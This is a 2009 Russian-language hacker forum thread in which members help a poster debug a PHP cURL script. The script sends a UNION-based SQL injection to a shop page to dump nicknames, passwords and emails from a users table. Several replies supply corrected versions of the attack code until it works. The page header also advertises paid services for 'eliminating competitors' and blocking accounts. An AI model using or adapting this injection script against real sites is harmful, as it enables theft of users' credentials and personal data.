Форум АНТИЧАТ - CURL,Веля и инъекция.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
CURL,Веля и инъекция.

Опции темы

Поиск в этой теме

Опции просмотра

CURL,Веля и инъекция.

11.03.2009, 15:33

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

CURL,Веля и инъекция.

День добрый (надеюсь).Такая вот канитель:

PHP код:


		
			


<?php



$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';

$limit = 0;

$ref = 'http://www.site.com/shop.php';

$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';

$ua = 'Fuck all!!!';

$ch = curl_init();



curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_REFERER,$ref);

curl_setopt($ch,CURLOPT_HEADER,1);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_USERAGENT,$ua);

curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);

curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);

curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');

curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');

$result = curl_exec($ch);

curl_close($ch);

echo $result;







?>

Вроде посылаю правильно(опять-таки надеюсь).В чём может быть причина ? Проблем с получением самой страницы не возникает,но вот сам результат запроса(а он верный,уверяю вас,господа ))) ).Два варианта: либо я передал неправильно(GET запрос всё же),либо что-то ещё.

ЗЫ: Самого результат SQL запроса из бд в ответе невидно

ЗЫ2: Веля не тупой... Веля гуглил!(

Последний раз редактировалось Велемир; 11.03.2009 в 15:52..

11.03.2009, 15:40

5triker

Участник форума

Регистрация: 05.04.2007

Сообщений: 150

Провел на форуме:
771228

Репутация: 77

вопще переменную , которая где то используется, нужно объявлять раньше того места

PHP код:


		
			
<?php

$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*';

$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';

$limit = 0;

$ref = 'http://www.site.com/shop.php';

$ua = 'Fuck all!!!';

$ch = curl_init();



curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_REFERER,$ref);

curl_setopt($ch,CURLOPT_HEADER,1);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_USERAGENT,$ua);

curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);

curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);

curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');

curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');

$result = curl_exec($ch);

curl_close($ch);

echo $result;







?>

11.03.2009, 15:43

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Всё равно не помогло (,но всё равно пасип )

11.03.2009, 15:50

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Отправить сообщение для wildshaman с помощью ICQ

А где строчка

Код:

curl_setopt($ch,CURLOPT_POSTFIELDS, $request);

11.03.2009, 15:51

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Так это же не пост данные...оО

ЗЫ: Пробывал и так,и эдак...всё мимо.

Последний раз редактировалось Велемир; 11.03.2009 в 15:55..

11.03.2009, 15:54

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

PHP код:


		
			
$url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676';

$limit = 0;

$ref = 'http://www.site.com/shop.php';

$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*';

Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова ..

PHP код:


		
			
$request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';

$url = 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676';

$limit = 0;

$ref = 'http://www.site.com/shop.php';

11.03.2009, 16:04

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

PHP код:


		
			


$url = 'http://www.site.com/shop.php?st=2&movie=-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.User limit 0,1/*&id=676';

$ref = 'http://www.site.com/shop.php';

$ua = 'Fuck you!!!';

$ch = curl_init();



...Тут код курлы...

CURLOPT_POSTFIELDS Убрал,так как данные гет.Зато теперь на экране красуется бэд рекьюст)

11.03.2009, 16:35

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Пасиппи,помог разобраться b3

Объявляю время отдыха и всеобщего празднества!)))

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL инъекция www.integracija.gov.lv	gadjet	Уязвимости	7	29.01.2006 14:25
Взлом БОЛЬШОГО БРАТА - tntbrat.ru. SQL - инъекция.	Егорыч+++	Комментарии к видео	84	11.08.2005 20:23
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
SQL инъекция в сервере MySQL	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход